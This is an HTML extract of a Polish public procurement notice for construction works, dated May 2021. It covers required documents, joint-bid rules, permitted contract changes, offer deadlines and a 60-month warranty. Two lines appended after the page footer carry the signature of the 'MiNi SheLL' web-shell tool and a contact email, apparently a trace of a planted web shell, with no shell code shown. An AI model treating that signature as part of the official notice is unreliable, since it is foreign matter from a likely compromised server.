zgodnie z zał. Nr 3a do SWZ.IX. Wykaz podmiotowych<br/>środków dowodowych składanych na wezwanie Zamawiającego1. W zakresie niepodlegania<br/>wykluczeniu:oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w Rozdziale 9 ust. 1 pkt. 1) SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego w rozdziale 6 ust. 2 pkt. 2-3</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Kosztorys ofertowy sporządzony metodą kalkulacji uproszczonej – zgodnie z załączonym<br/>kosztorysem ofertowym (w kosztorysie nie należy uwzględniać poz. 65, która została wykreślona) 2. Pełnomocnictwo – w przypadku, gdy oferta została podpisana przez<br/>pełnomocnika lub gdy oferta została złożona przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia zgodnie z art. 58 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11. W przypadku składania jednej oferty przez dwa lub więcej podmiotów (Wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia np. konsorcja, spółki cywilne) oferta spełniać<br/>musi następujące wymagania:1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich<br/>w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy sporządzić zgodnie z<br/>zapisami określonymi w Rozdziale 15 pkt. 5-6 SWZ;2) oferta musi być złożona w formie<br/>elektronicznej lub w postaci elektronicznej, podpisana kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym, w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie;3) wszelka korespondencja<br/>dokonywana będzie wyłącznie z podmiotem występującym jako reprezentant pozostałych <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z art. 454 ust. 1 ustawy PZP przewiduje możliwość dokonania zmian postanowień<br/>umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy w<br/>przypadku wystąpienia co najmniej jednej z okoliczności:Zmianie może ulec termin realizacji, w<br/>przypadku:wystąpienia robót dodatkowych, od wykonania których uzależnione jest wykonanie<br/>zamówienia podstawowego,wystąpienia konieczności wykonania robót zamiennych,<br/>wstrzymujących lub opóźniających realizację robót będących przedmiotem umowy,wystąpienia<br/>wad dokumentacji projektowej skutkującej koniecznością dokonania poprawek lub uzupełnień,<br/>jeżeli uniemożliwia to lub wstrzymuje realizację określonego rodzaju robót mających wpływ na<br/>termin wykonania umowy,wystąpienia konieczności ograniczenia zakresu rzeczowego<br/>przedmiotu zamówienia,zmiany ilości jednostek przedmiarowych robót objętych umową,zmiany<br/>technologiczne, w szczególności:a.konieczność zrealizowania projektu przy zastosowaniu<br/>innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, w<br/>szczególności w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem<br/>lub wadliwym wykonaniem robót,b.konieczność zrealizowania projektu przy zastosowaniu innych<br/>rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego<br/>prawa,c.pojawienie się nowszej technologii wykonania robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji<br/>wykonanego przedmiotu umowy,d.pojawienie się na rynku materiałów lub urządzeń nowszej<br/>generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów<br/>eksploatacji wykonanego przedmiotu umowy, lub umożliwiające uzyskanie lepszej jakości<br/>robót”.przestojów spowodowanych koniecznością usuwania nieumyślnych uszkodzeń<br/>istniejących urządzeń, nieoznaczonych w dokumentacji projektowej,niemożności wykonywania<br/>robót, gdy obowiązujące przepisy nie dopuszczają do wykonania robót lub nakazują<br/>wstrzymanie robót z przyczyn niezawinionych przez Wykonawcę,wystąpienia opóźnienia w<br/>dokonaniu określonych czynności lub ich zaniechania przez właściwe organy administracji<br/>państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi<br/>odpowiedzialność,zaistnienia innych okoliczności prawnych, ekonomicznych lub technicznych,<br/>skutkujących niemożliwością wykonania lub należytego wykonania umowy zgodnie z jej<br/>postanowieniami,wystąpienia zdarzenia losowego mającego charakter siły wyższej<br/>uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami,W przypadku<br/>wystąpienia którejkolwiek z w/w okoliczności termin realizacji przedmiotu zamówienia może ulec<br/>odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania przedmiotu w<br/>sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności, tj. o okres opóźniający<br/>lub wstrzymujący realizację zamówienia potwierdzony przez Zamawiającego i inspektora<br/>nadzoru inwestorskiego.Dopuszcza się zmianę osób sprawujących funkcje na budowie, w<br/>następujących przypadkach:nie wywiązywania się z obowiązków wynikających z umowy,jeżeli<br/>zmiana tych osób stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od<br/>Wykonawcy.dopuszcza sie zmianę osób odpowiedzialnych za kierowanie robotami<br/>budowlanymi, pod warunkiem, że zaproponowana osoba wykaże spełnianie warunków w<br/>zakresie nie mniejszym niż Zamawiający określił na etapie postępowania.Termin zakończenia<br/>prac może ulec skróceniu za zgodą Stron.Zamawiający dopuszcza możliwość zmiany albo<br/>rezygnacji z podwykonawców biorących udział w realizacji umowy za pomocą których<br/>Wykonawca wykazał spełnianie warunków udziału w postępowaniu o udzielenie zamówienia. W<br/>takim przypadku Wykonawca zobowiązany jest wykazać, że proponowany inny podwykonawca<br/>lub Wykonawca samodzielnie spełnia wymagania, ustawy Pzp oraz w SWZ w stopniu nie<br/>mniejszym niż wymagany w toku postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy eZamawiający - https://zamowienia.pila.lasy.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca udzieli Zamawiającemu minimum 60 miesięcznej gwarancji jakości na wykonane<br/>roboty, licząc od dnia bezusterkowego odbioru końcowego robót. 2. Gwarancja będzie<br/>obejmować: a. stwierdzone wady po odbiorze robót, b. usterki i wady związane z jakością i<br/>trwałością zastosowanych materiałów, jak również wykonania. 3. W ramach gwarancji Wykonawca zobowiązuje się, iż w ciągu 30 dni od daty pisemnego zgłoszenia przez<br/>Zamawiającego, dokona usunięcia ujawnionych wad i usterek, z zastrzeżeniem, że jeżeli<br/>warunki atmosferyczne nie pozwolą na efektywne usuniecie wad – strony uzgodnią odrębny<br/>termin na ich usunięcie. Szczegółowe warunki zamówienia określa SWZ wraz załącznikami.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com